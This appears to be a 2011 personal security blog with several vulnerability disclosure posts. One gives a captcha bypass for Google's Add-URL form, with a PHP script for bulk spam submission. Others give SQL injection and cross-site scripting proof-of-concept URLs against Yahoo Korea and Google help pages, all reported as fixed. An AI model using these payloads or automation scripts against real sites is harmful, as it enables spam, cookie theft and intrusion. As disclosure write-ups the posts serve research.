Add URL to Google.com Captcha Bypass

September 12, 2011
This Captcha bypass allow to spammer to submit number (that May be more than
1000 Website) of websites to Google crawl by writing simple program in any
programming language.

Original link (With captcha):
www.google.com/addurl/?continue=/addurl

Bypass captcha link POC:  http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=

If you execute the above URL in the browser
then it will add the new website to Google crawl database.

Following Program can be used to submit a large amount of website at a time.

PHP Code 

<?php
@if(isset($_POST)){
$part1 = "http://www.google.com/addurl?q=";
$part2 = "&hl=&dqq=";
$curl = curl_init("http://google.com");
curl_exec($curl);

$urls=$_POST["urls"];

$lines=explode("\n",$urls);
 
foreach($lines as $line)
{
    $new = str_replace(" ", "", $part1.$line.$part2);
    curl_setopt($curl,CURLOPT_URL,$new);
}}
echo "done.";
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form>
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>
</body>
</html>

This may be small Vulnerability but still we want google to most secure! So
please try to fix. Otherwise there will be no use of captcha .

Now Google Patched This vuln :) 

/peace

Sandeep k.
We Provide Penetration Testing

Lex Code Technologies

August 21, 2011

Welcome to Lex Code Technologies

Welcome to lexcode technologies – a professional web development and offshore outsourcing company based in India striving to deliver quality solutions with less profit margin by using technology and our vast experience. We offer a wide range of services to reach your targeted audience and share your valuable information focusing on retaining your customers. It’s our hard work, efficient and effective solution that has given us domestic and global giants as satisfied clients in a short span of 2 years.

 

For more information visit

www.Lexcodetechnologies.com

We Provide Penetration Testing

Project 0day – PHP Source Code Testing Tool

August 9, 2011

“PHP Source Auditor”

Overview

This is special purpose tool developed for developers who write the code in PHP ,  PSA scan depth into source code file and detect the vulnerable line of code , fetches vulnerability information to the developer .

System Requirement:

  1. Latest .NET Framework
  2. Windows Installed Machine

Following Vulnerability Detected By PSA:

  1. SQl Injection
  2. Remote File Inclusion
  3. Local File Inclusion
  4. Cross Site Scripting
  5. Cross Site Request Forgery
  6. Insecure Cookie Handling
  7. Remote Code Execution
  8. Remote Command Execution
  9. Authentication Bypass

Features :

  • Importing Multiple Files At a Time
  • User Friendly GUI
  • PHP Syntax Highlighting
  • Highlighting Vulnerable Code
  • Pop Up Box for Replacing Vulnerable Code
  • Advance Code Reviewing Method

Old Screen Shot Beta Version

Download Link : Distribution Close

New Version Will Be Release Soon

Regard

Sandeepk

We Provide Penetration Testing

Yahoo Korea SQL XSS vulnerability

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20

Yahoo Koria XSS

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regard

Sandeep Kamble

We Provide Penetration Testing

Google+ Help Support & Google Translator Help Support [XSS]

July 21, 2011

——————————————————————
0x1 Affected Script: Google+ Help Support & Google+ Help Support & Google Translator Help Support
0x2 Script Link: http://translate.google.com/& http://plus.google.com/

0x4 Author: Sandeep kamble
0x5 Reported : June 30 2011
0x6 Public Release July 21 2011
——————————————————————

Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.

Affected script :
1) +/bin/search.py?query=
2) support/bin/search.py?query=  (Subdomain Translator)

Exploit : 

Executing Javascript using the vulnerable variable called as ?Query . This attack is commonly know as Cross Site Scripting (XSS)
Google + affected script having stored Xss attack which can used for the grabbing the cookies .
Google Translator Non-persistent XSS attack which can be used to execute only the JS Script

POC :
1) Google +

http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search
Don’t shock , you might be thinking the payload “alert(‘ss’)” and give output as “XSS” in message . This is happen due to spelling (Google function did u meant ) ..

Try to search this keyword “<script>alert(‘ss’)</script>” you will get the answer why it was coming.

2) Translator Google
http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
I don’t have screen shot of Google translator XSS attack.

 

Google XSS

 

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short perform input sanitization

Thank you to Google

http://www.google.com/about/corporate/company/halloffame.html

If you want to test your application. Vulnerability Research and Penetration testing service. Follow me on Twitter @sandeepL337

 

We Provide Penetration Testing

About my blog & me

This is my personal blog , i am going to share my personal things which is related to IT security . I am going to share my all expreinces which is realted to Information technology .

Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, shaista mam & my team :) and my friends Kishor , Lalit , Jitu ,Mug .

My Gmail : sandeepk.l337@gmail.com

We Provide Penetration Testing

Tags


We Provide Penetration Testing